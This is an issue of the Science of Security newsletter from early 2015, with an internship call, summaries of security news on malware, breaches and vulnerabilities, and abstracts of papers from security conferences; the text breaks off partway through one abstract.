Science of Security (SoS) Newsletter (2015 - Issue 1)

Newsletter Banner

Science of Security (SoS) Newsletter (2015 - Issue 1)


Each issue of the SoS Newsletter highlights achievements in current research, as conducted by various global members of the Science of Security (SoS) community. All presented materials are open-source, and may link to the original work or web page for the respective program. The SoS Newsletter aims to showcase the great deal of exciting work going on in the security community, and hopes to serve as a portal between colleagues, research projects, and opportunities.

Please feel free to click on any issue of the Newsletter, which will bring you to their corresponding subsections:

General Topics of Interest

General Topics of Interest reflects today’s most popularly discussed challenges and issues in the Cybersecurity space. GToI includes news items related to Cybersecurity, updated information regarding academic SoS research, interdisciplinary SoS research, profiles on leading researchers in the field of SoS, and global research being conducted on related topics.

Publications

The Publications of Interest provides available abstracts and links for suggested academic and industry literature discussing specific topics and research problems in the field of SoS. Please check back regularly for new information, or sign up for the CPSVO-SoS Mailing List.

Table of Contents

Science of Security (SoS) Newsletter (Vol 2015 - Issue 1)

(ID#:14-3354)


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


 

Science of Security (SoS) Summer Internships

SoS Summer Internships


Seeking top undergrads for a Science of Security summer internship

The Science of Security Summer Internship at the Information Trust Institute at the University of Illinois Urbana-Champaign offers undergraduates the opportunity to explore the field of cybersecurity through a unique summer program. Science of security is an emerging area that emphasizes the methodology of research in cybersecurity as much as the results - an approach that is critical in addressing the fundamental problems of security in a principled manner.

Participants will spend the summer pursuing a research program of their own design, under the mentorship of ITI faculty and/or staff. In addition to the research, the summer internship program will include visits to companies to learn about the issues and practice of cyber-security in the real world. Applications are due Feb. 1, 2015.

This program is sponsored by the National Security Agency through the Illinois Science of Security (SoS) Lablet Program.

Program dates: June 1 - July 24 (subject to change)

Information Needed for Application

  • Research Project Proposal
  • Resume
  • Transcripts
  • Names and contact information for 3 references

Important Dates

February 1, 2015 - Applications due February 27, 2015 - Selection made

Please submit application materials by February 1 to https://my.iti.illinois.edu/submit/. Questions? Please contact Andrea Whitesell at whitesel@illinois.edu.

(ID#:14-3363)


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


In the News

In the News


This section features topical, current news items of interest to the international security community. These articles and highlights are selected from various popular science and security magazines, newspapers, and online sources.

(ID#:14-3355)


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


International News

International News


"Skeleton Key malware linked to backdoor Trojan: Symantec," Security Week, 30 January 2015. Symantec researchers have discovered that Skeleton Key, malware discovered earlier this month that targets Active Directory domain controllers may be connected to "Backdoor.Winnti," which has previously attacked Asian gaming companies. (ID# 14-70078) See http://www.securityweek.com/skeleton-key-malware-linked-backdoor-trojan-symantec

"Cybercriminals encrypt website databases in 'RansomWeb' attacks," Security Week, 29 January 2015. Known as "RansomWeb," these attacks are executed over a long period of time in order to avoid detection. The attackers compromise a company's web application, then manipulate server scripts in order to encrypt data before it's stored into the database. Once even backups are encrypted, with the attackers ensuring that the key is nearly impossible to obtain, company data is effectively held hostage until payment is made. (ID# 14-70079) See: http://www.securityweek.com/cybercriminals-encrypt-website-databases-%E2%80%9Cransomweb%E2%80%9D-attacks

"What do China, FBI, and UK have in common? All three want backdoors in Western technology," The Register UK, 29 January 2015. The Chinese government is pressing for backdoors to be added to all imported technology, and they're not alone. Security experts see backdoors as a major vulnerability and condemn the notion as "unworkable." With China, the U.S. government, and the U.K. government all pushing for backdoor access to devices, the subsequent "international backdoor" would prove problematic. (ID# 14-70081) See: http://www.theregister.co.uk/2015/01/29/china_pushes_mandatory_backdoors/

"Regin super-malware has Five Eyes fingerprints all over it says Kaspersky," The Register UK, 28 January 2015. The malware "Regin," which evaded detection for up to six years, is often compared to Stuxnet and Duqu. Kaspersky analysts now say that Regin is the handiwork of a Five Eyes intelligence member nation (abbreviated FVEY, consisting of Australia, Canada, New Zealand, the U.K., and the U.S.). A discovered Regin plugin bears remarkable resemblance to source code produced by a Five Eyes nation. (ID# 14-70082) See: http://www.theregister.co.uk/2015/01/28/malware_bods_find_regin_malware_reeks_of_warriorpride/

"Estonia President wants China and Russia to help fight cyber crime", SC Mag.UK, 26 January 2015. At the "Fighting Shadows" convention in Switzerland, leaders from Kaspersky, Microsoft, and The United Nations met to discuss the appropriate response to cyber attacks, and the need for countries to stand united in an international coalition against cyber-crime. The failure of Russia and China, both countries notorious for cyber attacks, to sign the Budapest Convention is cited as an example that international anti-cyber-crime cooperation is not yet a reality. (ID# 14-70083) See: http://www.scmagazineuk.com/estonia-president-wants-china-and-russia-to-help-fight-cyber-crime/article/394366/

"European govts. urge U.S. tech companies to remove terrorist-related postings from sites", Homeland Security News Wire, 22 January 2015. French and German authorities have requested aid from US tech firms in identifying and removing radical terrorist material from social media sites, such as hate speech and radical recruitment videos. Following the terrorist attacks in Paris, sites like Facebook and Twitter are being asked to cooperate in pre-emptive filtering. U.S. tech firms are calling this move ineffective. (ID# 14-70084) See: http://www.homelandsecuritynewswire.com/dr20150122-european-govts-urge-u-s-tech-companies-to-remove-terroristrelated-postings-from-sites

"Skeleton Key Malware Analysis," Dell Secure Works, 12 January 2015. Dell SecureWorks Counter Threat Unit is reporting malware, dubbed Skeleton Key that bypasses authentication on Active Directory (AD) systems that implement single-factor authentication only. Attackers are able to gain access as any user by using a password of their choice, while the legitimate user can continue to authenticate as usual. Skeleton Key has since been deployed using stolen domain administrator credentials. (ID# 14-70085) See: http://www.secureworks.com/cyber-threat-intelligence/threats/skeleton-key-malware-analysis/

"The Centcom 'hack' that wasn't," The Washington Post, 12 January 2015. A hacker group calling itself "CyberCaliphate" claims to be responsible for the hijacking of several U.S. military Central Command social media channels. The group allegedly leaked "classified" military PowerPoints and data, which many observers have pointed out, are not classified at all. In fact, much of the "leaked" documents are publically available, and come from sources like MIT's Lincoln Library and Google. (ID# 14-70086) See:  http://www.washingtonpost.com/blogs/the-switch/wp/2015/01/12/the-centcom-hack-that-wasnt/

"Surprise! North Korea's official news site delivers malware, too,", Ars technica, 12 January 2015. A security researcher recently discovered that North Korea's official news service, the Korean Central News Agency, also spreads malware. Disguised as a download entitled "FlashPlayer10.zip," for the incredibly obsolete Flash Player 10, the executable file contains a familiar Windows malware dropper. (ID# 14-70087) See: http://arstechnica.com/security/2015/01/surprise-north-koreas-official-news-site-delivers-malware-too/

"WhatsApp and iMessage could be banned under new surveillance plans," The Independent UK, 12 January 2015. Prime Minister David Cameron, of the U.K., seeks to prohibit the use of communication that can circumvent security services, such as auto-encrypted Apple iMessafe and WhatsApp, following the recent Paris shootings. (ID# 14-70088) See: http://www.independent.co.uk/life-style/gadgets-and-tech/news/whatsapp-and-snapchat-could-be-banned-under-new-surveillance-plans-9973035.html

"A cyberattack has caused confirmed physical damage for second time ever," Wired, 8 January 2015. In a case eerily mirroring Stuxnet, hackers have managed to cause the only second confirmed case of physical destruction of equipment by digital means. Hackers targeted an unnamed German steel mill, manipulating control systems to severely impede shut down of a blast furnace, effectively causing "massive" damage. The attackers executed a spear-fishing attack, and utilized the downloaded malware to gain access to one system. (ID# 14-70089) See: http://www.wired.com/2015/01/german-steel-mill-hack-destruction/

"Fingerprint theft just a shutter click away." Tech News World, 7 January 2015. Biometrics used for authentication purposes is seen as a multiple factor. Initially seen as a more secure way to protect personal data, biometrics should be used as part of two-factor authentication, at the very least. German hackers known as the Chaos Computer Club have demonstrated a way to lift prints. Security consultant Catherine Pearce reminds users that at least compromised passwords can be easily changed, not so much with fingerprints. (ID# 14-70090) See: http://www.technewsworld.com/story/81548.html

"Pro-ISIS hackers target New Mexico newspapers and hit paywall." The Denver Post, 6 January 2015. An ISIS-sympathetic hacker group, under the moniker "CyberCaliphate", has hacked the Mountain View Telegraph, a newspaper from a small New Mexico town. "Infidels, New Year will make you suffer" reads the message, but in order to see more, readers must answer a Google questionnaire. (ID# 14-70091) See: http://blogs.denverpost.com/techknowbytes/2015/01/06/pro-isis-hackers-target-new-mexico-newspapers/15032/

"U.S. firm finds malware targeting visitors to Afghan govt websites", Reuters, 21 December 2014. A newly discovered campaign, dubbed "Operation Poisoned Helmand," uses a watering-hole type attack to target users of trusted Afghan government websites. U.S. cybersecurity researchers say China, whose interests in Afghanistan have increased in light of U.S. and NATO decreased military presence, is the most likely threat actor. (ID# 14-70092) See: http://in.reuters.com/article/2014/12/21/china-afghanistan-cybersecurity-idINKBN0JZ0K420141221

(ID#:14-3356)


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


 

US News

US News


"Firm finds link between Regin spy tool and QWERTY keylogger," SC Mag., 27 January 2015. [Online]. Earlier this month, the source code for the so-called "QWERTY" keylogger malware was released as part of recent Snowden leaks and was found to have been used by numerous national intelligence agencies. Researchers found that QWERTY is identical in functionality to a specific module of the "Regin" spy tool and concluded that they were both produced by the same (or at least cooperating) developers. (ID: 14-50193) See: http://www.scmagazine.com/tool-detailed-in-snowden-documents-functions-like-regin/article/394764/

"CTB-Locker ransomware variant being distributed in spam campaign," SC Mag., 23 January 2015. [Online]. Trend Micro has identified a new strain of the bitcoin ransomware "Critroni," which is unique in its unusually high ransom demand and longer time to pay the ransom: ninety-six hours to pay three bitcoins, or about $700. This version is spread via a spam campaign and is "predominately impacting users in Europe, the Middle East and Africa (EMEA), China, Latin America and India." (ID: 14-50194) See: http://www.scmagazine.com/critroni-variant-of-ctb-locker-now-gives-victims-extra-time-to-pay-ransom/article/394247/

"NAFCU asks Congress to create bipartisan data breach working group," SC Mag., 22 January 2015. [Online]. The National Association of Federal Credit Unions (NAFCU) urged the U.S. Congress and Senate in a letter to consider creating a bicameral working group to help find solutions and pass legislation to combat the growing threat and consequences of data breaches. In a divided government, bipartisan cooperation and cooperation between government branches are integral parts of combating cybersecurity issues like data breaches. (ID: 14-50195) See: http://www.scmagazine.com/credit-unions-want-input-in-development-of-national-breach-law/article/394006/

"Adobe plugs Flash zero-day, investigates separate exploit reports," SC Mag., 22 January 2015. [Online]. Adobe has released a patch for the CVE-2015-0310, a Flash vulnerability that would allow hackers to bypass "memory randomization mitigations on the Windows operating system." Adobe is also investigating the Flash Player vulnerability CVE-2015-0311 and has announced that consumers should expect a patch in the near future. (ID: 14-50196) See:http://www.scmagazine.com/adobe-issues-emergency-fix-for-flash-player-vulnerability/article/393977/

"Android malware encounters surged in 2014, up by 75 percent, report says," SC Mag., 15 January 2015. [Online]. Mobile security company Lookout found that around 6.4 million Android devices were infected with malware in 2014, an astonishing 75 percent increase from 2013. Mobile devices are often seen as being safer that traditional personal computers, and they generally are -- but the increased functionality and usage in financial and business contexts means that they are becoming high-value targets. (ID: 14-50197) See: http://www.scmagazine.com/lookout-releases-2014-mobile-threat-report/article/392814/

"Skeleton Key Malware Analysis," Dell SecureWorks Counter Threat Unit Threat Intelligence, 12 January 2015. [Online]. The newly-discovered "Skeleton Key" malware allows attackers to bypass Active-Directory (AD) systems that only employ passwords for authentication. Skeleton Key allows attackers to authenticate themselves as a legitimate user, thereby granting them access to remote access services within a victim network. Two variants were found, the older of which allowed attackers to analyze the victim's patching process. (ID: 14-50198) See: http://www.secureworks.com/cyber-threat-intelligence/threats/skeleton-key-malware-analysis/

"Pro-ISIS attackers compromise U.S. Central Command Twitter and YouTube accounts," SC Mag., 12 January 2015. [Online]. The U.S. Central Command (CENTCOM) confirmed that its YouTube and Twitter accounts were hacked. Both accounts were taken offline after attackers, who appear to have been supporters of the Islamic State, used the accounts to post military documents and threatening messages. The military documents, though disguised to look like part of a new breach, were actually part of the public domain. It is suspected that the attackers obtained credentials through some kind of phishing or brute-force attack. (ID: 14-50199) See: http://www.scmagazine.com/us-central-command-social-media-accounts-hacked/article/392128/

"Cisco Annual Security Report Reveals Widening Gulf between Perception and Reality of Cybersecurity Readiness," Security Mag., 20 January 2015. [Online]. Cyber criminals have been constantly developing techniques of increasing sophistication to evade detection and bypass security measures, which means that security teams need to work together on improving their methods more than ever before. According to a study by Cisco, however, not everybody is on the same page when it comes to perceptions of cyber readiness. (ID: 14-50200) See: http://www.securitymagazine.com/articles/86050-cisco-annual-security-report-reveals-widening-gulf-between-perception-and-reality-of-cybersecurity-readiness

"Obama Calls for Data Breach Notification Law," Security Mag., 12 January 2015. [Online]. U.S. President Barack Obama intends to ask Congress to pass a law that requires companies to report data breaches to victims within thirty days, as well as a second privacy law that would allow consumers to decide what personal data they are willing to give to companies, and how they want that data to be used. Additionally, Obama intends to push for a digital privacy bill that would regulate collection and use of data collected from educational services. (ID: 14-50201) See: http://www.securitymagazine.com/articles/86043-obama-calls-for-data-breach-notification-law

"Snowden reveals that China stole plans for a new F-35 aircraft fighter," Cyber Def. Mag., 22 January 2015. [Online]. According to Snowden leaks, Chinese government hackers were able to obtain plans and technical data -- potentially as much as 50 terabytes worth -- for a new F-35 fighter jet. The F-35, which is being developed by Lockheed Martin at a record-breaking $400 billion, is a joint effort between the U.S., U.K., and Australian governments. (ID: 14-50202) See: http://www.cyberdefensemagazine.com/snowden-reveals-that-china-stole-plans-for-a-new-f-35-aircraft-fighter/

"5800 Gas Station Tank Gauges vulnerable to cyber attacks", Cyber Def. Mag., 26 January 2015. [Online]. Recent research by Rapid7 has found that approximately 5,800 gas stations across the U.S. are vulnerable to remote cyber attacks. The affected gas stations all use Automated Tank Gauges (ATGs), devices that are used to prevent overfilling of underground storage tanks that have no password protection. Compromised ATGs could potentially produce false alarms and shut down a station. (ID: 14-50203) See: http://www.cyberdefensemagazine.com/5800-gas-station-tank-gauges-vulnerable-to-cyber-attacks/

"USA and UK announce joint cyber 'war games' to improve cyber defenses," Cyber Def. Mag., 20 January 2015. [Online]. The U.S. and U.K. have agreed to participate in mutual cyber "war games" in which teams from each nation would "attack" each other to bring to light security flaws in each other's systems. The exercises are intended to prepare both nations for real-life state-sponsored attacks. British Prime Minister David Cameron stressed the importance of cyber security readiness in his announcement of the war games, noting that cyberattacks "can have real consequences to people's prosperity". (ID: 14-50204) See: http://www.cyberdefensemagazine.com/usa-and-uk-announce-joint-cyber-war-games-to-improve-cyber-defenses/

"Project Zero team has disclosed a new unpatched Windows 8 flaw," Cyber Def. Mag., 15 January 2015. [Online]. Google's Project Zero hacking team has disclosed a newly found Windows 8.1 and Windows 7 "Privilege Escalation" vulnerability, and has demonstrated it in a simulated Proof of Concept (PoC) attack. There has been disagreement between Google and Microsoft about the disclosure policy; Microsoft had asked Google to delay the disclosure of the bug, with the intention to fix it by February 2015. Google refused, and disclosed it within the normal 90-day timeline. (ID: 14-50205) See: http://www.cyberdefensemagazine.com/project-zero-team-has-disclosed-a-new-unpatched-windows-8-flaw/

"Malaysia Airlines Site Back Up as Hackers Threaten Data Dump," Infosecurity Mag., 27 January 2015. [Online]. Hacking group "Lizard Squad" has claimed responsibility for an attack on Malaysia Airline's website and has threatened on social media to release stolen data, though the airline claims that no sensitive data was stolen. Visitors to the website were directed to a page apparently owned by Lizard Squad, though the issue has since been resolved. (ID: 14-50206) See: http://www.infosecuritymagazine.com/news/malaysia-air-site-back-hackers/

"China Blamed for MITM Attack on Outlook," Infosecurity Mag., 19 January 2015. [Online]. Anti-censorship rights group Greatfire.org is pointing fingers at China's Cyberspace Administration after an attack on Microsoft Outlook users. The daylong MITM attack, which utilized a self-signed certificate, is suspected by some to be an attempt by China to test their MITM capabilities, which are used to bypass HTTPS and intercept communications. (ID: 14-50209) See: http://www.infosecurity-magazine.com/news/china-blamed-for-mitm-attack-on/

"Windows 10: Secure enough for government?" GCN, 23 January 2015. [Online]. Windows 10 will feature new and improved security features, including technologies such as multifactor authentication, data-loss prevention, and other low-level hardware and kernel measures. Newer security features could be very attractive for government and business, who are facing increasing amounts of cyber threats. (ID: 14-50210) See: http://gcn.com/articles/2015/01/23/windows-10-security.aspx?admgarea=TC_SecCybersSec

"Critical Java updates fix 19 vulnerabilities, disable SSL 3.0," ComputerWorld, 21 January 2015. [Online]. A new Java security update patches 19 vulnerabilities and removes support for Secure Sockets Layer (SSL) 3.0, which is outdated and vulnerable. A significant portion of the 19 vulnerabilities scored high on the severity scale, with six scoring 9.3 or above out of 10. Additionally, this will be the last security update for Java 7 (without a long term contract); users will need to migrate to Java 8 to receive automatic updates in the future. (ID: 14-50211) See: http://www.computerworld.com/article/2873215/critical-java-updates-fix-19-vulnerabilities-disable-ssl-30.html

"Fed data at risk in attacks on university computers," FCW, 27 January 2015. [Online]. University computer networks, which contain large volumes of both devices and data, are a lucrative target for cyber criminals, according to a memo by the Department of Homeland Security (DHS). Last spring, for instance, attackers were able to utilize a supercomputer at a U.S. university to perform DDoS attacks on several businesses that provide server services for gaming. (ID: 14-50212) See: http://fcw.com/articles/2015/01/27/fed-data-at-risk.aspx

"Ending the tyranny of passwords," FCW, 16 January 2015. [Online]. The FIDO (Fast IDentity Online) Alliance, a collaborative effort between 150 members including Google and Samsung, has been striving towards creating stronger two-factor authentication systems while phasing out passwords as a method of authentication. The group has been working to create specifications for newer methods like biometrics and hardware tokens, technologies that could prove to be much more secure than passwords without compromising convenience. (ID: 14-50213) See: http://fcw.com/articles/2015/01/16/tyranny-of-passwords.aspx

"How can we protect our information in the era of cloud computing?" University of Cambridge Research, 26 January 2015. [Online]. Researcher Jon Crowcroft argues that cloud storage puts data at an increased risk; rather, information should be stored in a diverse range of P2P systems. Spreading data out, according to Crowcroft, would not just hamper efforts to obtain that information illegitimately, but would make it easier to access as well. The centralized nature of cloud solutions, on the other hand, can make data easier to steal. (ID: 14-50214) See: http://www.cam.ac.uk/research/news/how-can-we-protect-our-information-in-the-era-of-cloud-computing

"NIST Revises Crypto Standards Guide," Gov Info Security, 23 January 2015. [Online]. The National Institute of Standards and Technology (NIST) has just released its NIST Cryptographic Standards and Guidelines, a document which details NIST's new cryptographic standard development process. Notably, the document stresses transparency and details the interactions between NIST and the NSA, a relationship which has sparked considerable negative publicity since the first draft was issued nearly a year ago. (ID: 14-50215) See: http://www.govinfosecurity.com/nist-revises-crypto-standards-guide-a-7831

"New technology proves effective in thwarting cyberattacks on drones," Homeland Security News Wire, 27 January 2015. [Online]. Researchers with the University of Virginia and Georgia Institute of Technology have successfully tested methods developed by the multi-university Systems Engineering Research Center to keep unmanned aerial vehicles safe from cyber attack. Drones, as they are often referred to, are used to collect sensitive data and even perform missile strikes, which makes security a necessity. (ID: 14-50216) See: http://www.homelandsecuritynewswire.com/dr20150127-new-technology-proves-effective-in-thwarting-cyberattacks-on-drones

"Universities adding cybersecurity programs to their curricula to meet growing demand," Homeland Security News Wire, 14 January 2015. [Online]. The increasing prevalence and gravity of cyber attacks has led to a high demand for well-trained cybersecurity workers, which has in turn increased the demand for cybersecurity education. Many universities are bulking up their cybersecurity programs, and students are taking advantage of the value that cybersecurity education can give them in the job market. (ID: 14-50217) See: http://www.homelandsecuritynewswire.com/dr20150114-universities-adding-cybersecurity-programs-to-their-curricula-to-meet-growing-demand

"It Took Me Two Clicks To Trace Ross Ulbricht To The Silk Road," Forbes, 16 January 2015. [Online]. Computer security researcher Nicholas Weaver details how he was able to connect Ross Ulbricht to the deep-web marketplace "Silk Road" by tracing bitcoin transactions. According to Weaver, 3,255 bitcoins (about $300,000 USD) was transferred from the Silk Road to Ulbricht. Ulbricht is currently being charged as the alleged founder of the anonymous market. (ID: 14-50218) See: http://www.forbes.com/sites/valleyvoices/2015/01/16/it-took-me-two-clicks-to-trace-ross-ulbricht-to-the-silk-road/?ss=Security

"Linux makers release patch to thwart new 'Ghost' cyber threat," Reuters, Edition: U.S., 27 January 2015. [Online]. Linux distribution developers, including Red Hat Inc., have released a patch to fix "Ghost," a vulnerability which could purportedly allow hackers to remotely control vulnerable systems. Researchers found that they could compromise servers with a malicious email, without that email even being opened. Fortunately, there have not been any reports of the vulnerability being used "in the wild." As with Heartbleed and shellshock, the vulnerability was discovered in open-source software; which in this case is the Linux GNU C Library. (ID: 14-50219) See: http://www.reuters.com/article/2015/01/27/us-cybersecurity-linux-idUSKBN0L02RS20150127

(ID#:14-3357)


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


 

International Security Research Conferences

International Conferences


The following pages provide highlights on Science of Security related research presented at the following International Conferences:

  • Signal Propagation and ComputerTechnology 2014,India
  • Information Assurance and Cyber Security (CIACS) 2014, Pakistan
  • Cyber Security, Cyber Warfare, and Digital Forensics (CyberSec) 2014, Beirut
  • Information Security for South Africa, 2014


(ID#:14-3359)


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Cyber Security, Cyber Warfare, and Digital Forensics (CyberSec) - Beirut, Lebanon

Cyber Security, Cyber Warfare, And Digital Forensics - Beirut


The 2014 Third International Conference on Cyber Security, Cyber Warfare and Digital Forensic (CyberSec), was held April 29 2014-May 1 2014 at Beirut, Lebanon.  The twelve papers published from it are cited here.

 

Watney, M., "Challenges Pertaining To Cyber War Under International Law," Cyber Security, Cyber Warfare and Digital Forensic (CyberSec), 2014 Third International Conference on, pp.1,5, April 29 2014-May 1 2014. doi: 10.1109/CyberSec.2014.6913962 State-level intrusion in the cyberspace of another country seriously threatens a state's peace and security. Consequently many types of cyberspace intrusion are being referred to as cyber war with scant regard to the legal position under international law. This is but one of the challenges facing state-level cyber intrusion. The current rules of international law prohibit certain types of intrusion. However, international law does not define which intrusion fall within the prohibited category of intrusion nor when the threshold of intrusion is surpassed. International lawyers have to determine the type of intrusion and threshold on a case-by-case basis. The Tallinn Manual may serve as guideline in this assessment, but determination of the type of intrusion and attribution to a specific state is not easily established. The current rules of international law do not prohibit all intrusion which on statelevel may be highly invasive and destructive. Unrestrained cyber intrusion may result in cyberspace becoming a battle space in which state(s) with strong cyber abilities dominate cyberspace resulting in resentment and fear among other states. The latter may be prevented on an international level by involving all states on an equal and transparent manner in cyberspace governance.

Keywords: law; security of data; Tallinn Manual; cyber war; cyberspace governance; cyberspace intrusion; international law; legal position; state-level cyber intrusion; Computer crime; Cyberspace; Force; Law; Manuals; Cyber war; Estonia; Stuxnet; challenges; cyberspace governance; cyberspace state-level intrusion; international law (ID#: 14-3392)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6913962&isnumber=6913961

 

Holm, E.; Mackenzie, G., "The Importance Of Mandatory Data Breach Notification To Identity Crime," Cyber Security, Cyber Warfare and Digital Forensic (CyberSec), 2014 Third International Conference on, pp.6,11, April 29 2014-May 1 2014. doi: 10.1109/CyberSec.2014.6913963 The relationship between data breaches and identity crime has been scarcely explored in current literature. However, there is an important relationship between the misuse of personal identification information and identity crime as the former is in many respects the catalyst for the latter. Data breaches are one of the ways in which this personal identification information is obtained by identity criminals, and thereby any response to data breaches is likely to impact the incidence of identity crime. Initiatives around data breach notification have become increasingly prevalent and are now seen in many State legislatures in the United States and overseas. The Australian Government is currently in the process of introducing mandatory data breach notification laws. This paper explores the introduction of mandatory data breach notification in Australia, and lessons learned from the experience in the US, particularly noting the link between data breaches and identity crime. The paper proposes that through the introduction of such laws, identity crimes are likely to be reduced.

Keywords: {computer crime; law; Australia; US; identity crime; mandatory data breach notification laws; personal identification information; Australia; Data privacy; Educational institutions; Government; Law; Privacy; Security; data breaches; identity crime; mandatory breach reporting; privacy (ID#: 14-3393)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6913963&isnumber=6913961

 

Mohamed, I.A.; Bt Abdul Manaf, A., "An enhancement of traceability model based-on scenario for digital forensic investigation process," Cyber Security, Cyber Warfare and Digital Forensic (CyberSec), 2014 Third International Conference on, pp.12,15, April 29 2014-May 1 2014. doi: 10.1109/CyberSec.2014.6913964 Digital forensic investigation process is about identifying and tracing the cause of the incident, whereby traceability is very important process during the investigation by searching for the evidence. However, the traceability model of digital forensic investigation process is enhanced based on scenario with proven literature and justification.

Keywords: digital forensics; program diagnostics; digital forensic investigation process; incident cause identification; incident cause tracing; traceability model based-on scenario enhancement; Adaptation models; Computational modeling; Conferences; Digital forensics; Educational institutions; Materials; Safety; Evidence; Forensic; Scenario; traceability (ID#: 14-3394)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6913964&isnumber=6913961

 

Geepalla, E., "Comparison Between Alloy and Timed Automata for Modelling And Analysing Of Access Control Specifications," Cyber Security, Cyber Warfare and Digital Forensic (CyberSec), 2014 Third International Conference on, pp.16,21, April 29 2014-May 1 2014. doi: 10.1109/CyberSec.2014.6913965 This paper presents a comparative study between Alloy and Timed Automata for modelling and analysing of access control specifications. In particular, this paper compares Alloy and Timed Automata for modelling and analysing of Access Control specifications in the context of Spatio-Temporal Role Based Access Control (STRBAC) from capability and performance points of view. To conduct the comparison study the same case study (SECURE bank system) is specified using Alloy and Timed Automata. In order to transform the specification of the Secure Bank system into Alloy and Timed Automata this paper makes use of our earlier methods AC2Alloy and AC2Uppaal respectively. The paper then identifies the most important advantages and disadvantages of Alloy and Timed Automata for modelling and analysing of access control specifications.

Keywords: authorisation; automata theory; bank data processing; directed graphs; formal specification;AC2Alloy method;AC2Uppaal method; SECURE bank system; STRBAC; access control specification analysis ;access control specification modelling; directed graph; spatio-temporal role based access control; timed automata; Access control; Analytical models; Automata; Clocks; Computational modeling; Metals; Object oriented modeling (ID#: 14-3395)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6913965&isnumber=6913961

 

Yusoff, M.N.; Mahmod, R.; Dehghantanha, A.; Abdullah, M.T., "An Approach For Forensic Investigation in Firefox OS," Cyber Security, Cyber Warfare and Digital Forensic (CyberSec), 2014 Third International Conference on, pp.22,26, April 29 2014-May 1 2014. doi: 10.1109/CyberSec.2014.6913966 The advancement of smartphone technology has attracted many companies in developing mobile operating system. Mozilla Corporation recently released Linux-based open source operating system, named Firefox OS. The emergence of Firefox OS has created new challenges, concentrations and opportunities for digital investigators. In general, Firefox OS is designed to allow smartphones to communicate directly with HTML5 applications using JavaScript and newly introduced WebAPI. However, the used of JavaScript in HTML5 applications and solely no OS restriction might lead to security issues and potential exploits. Therefore, forensic analysis for Firefox OS is urgently needed in order to investigate any criminal intentions. This paper will present an approach and methodology in forensically sound manner for Firefox OS.

Keywords: Internet; Java; Linux; application program interfaces; digital forensics; hypermedia markup languages; mobile computing; public domain software; smart phones; Firefox OS; HTML5 applications; JavaScript; Linux-based open source operating system; Mozilla Corporation; OS restriction; WebAPI; criminal intentions; digital investigation; forensic analysis; forensic investigation; mobile operating system; potential exploits; security issues; smartphone technology; Forensics; Google; Mobile communication; Operating systems; Security; Smart phones; Firefox OS; Forensic Method; Mobile forensics; digital investigation (ID#: 14-3396)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6913966&isnumber=6913961

 

Yusoff, M.N.; Mahmod, R.; Abdullah, M.T.; Dehghantanha, A., "Mobile Forensic Data Acquisition in Firefox OS," Cyber Security, Cyber Warfare and Digital Forensic (CyberSec), 2014 Third International Conference on, pp.27,31, April 29 2014-May 1 2014. doi: 10.1109/CyberSec.2014.6913967 Mozilla Corporation has recently released a Linux-based open source operating system, namely Firefox OS. The arrival of this Firefox OS has created new challenges, concentrations and opportunities for digital investigators. Currently, Firefox OS is still not fully supported by most of the existing mobile forensic tools. Even when the phone is detected as Android, only pictures from removable card was able to be captured. Furthermore, the internal data acquisition is still not working. Therefore, there are very huge opportunities to explore the Firefox OS on every stages of mobile forensic procedures. This paper will present an approach for mobile forensic data acquisition in a forensically sound manner from a Firefox OS running device. This approach will largely use the UNIX dd command to create a forensic image from the Firefox OS running device.

Keywords: Linux; data acquisition; image forensics; mobile computing; public domain software; Android phone; Firefox OS; Linux-based open source operating system; Mozilla Corporation ;UNIX dd command; digital investigators; forensic image; internal data acquisition; mobile forensic data acquisition; Data acquisition; Flash memories; Forensics; GSM; Mobile communication; Smart phones; Firefox OS; Mobile forensic; data acquisition (ID#: 14-3397)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6913967&isnumber=6913961

 

Rjaibi, N.; Gannouni, N.; Ben Arfa, L.; Ben Aissa, A., "Modeling the Propagation Of Security Threats: An E-Learning Case Study," Cyber Security, Cyber Warfare and Digital Forensic (CyberSec), 2014 Third International Conference on , vol., no., pp.32,37, April 29 2014-May 1 2014. doi: 10.1109/CyberSec.2014.6913968 In this paper, we propose a novel linear model for modeling the propagation of security threats among the system's architectural components which is the Threats Propagation model (TP). Our model is based on the Mean Failure Cost cyber-security model (MFC) and applied to an e-learning system. The Threats propagation model (TP) enables to show if a threat can propagate to other e-learning systems components. Then, it provides an efficient diagnostic about the most critical threats in order to make the best decision and to establish the suitable countermeasures to avoid them. Our proposed model is useful to implement a safe and secure e-learning environment.

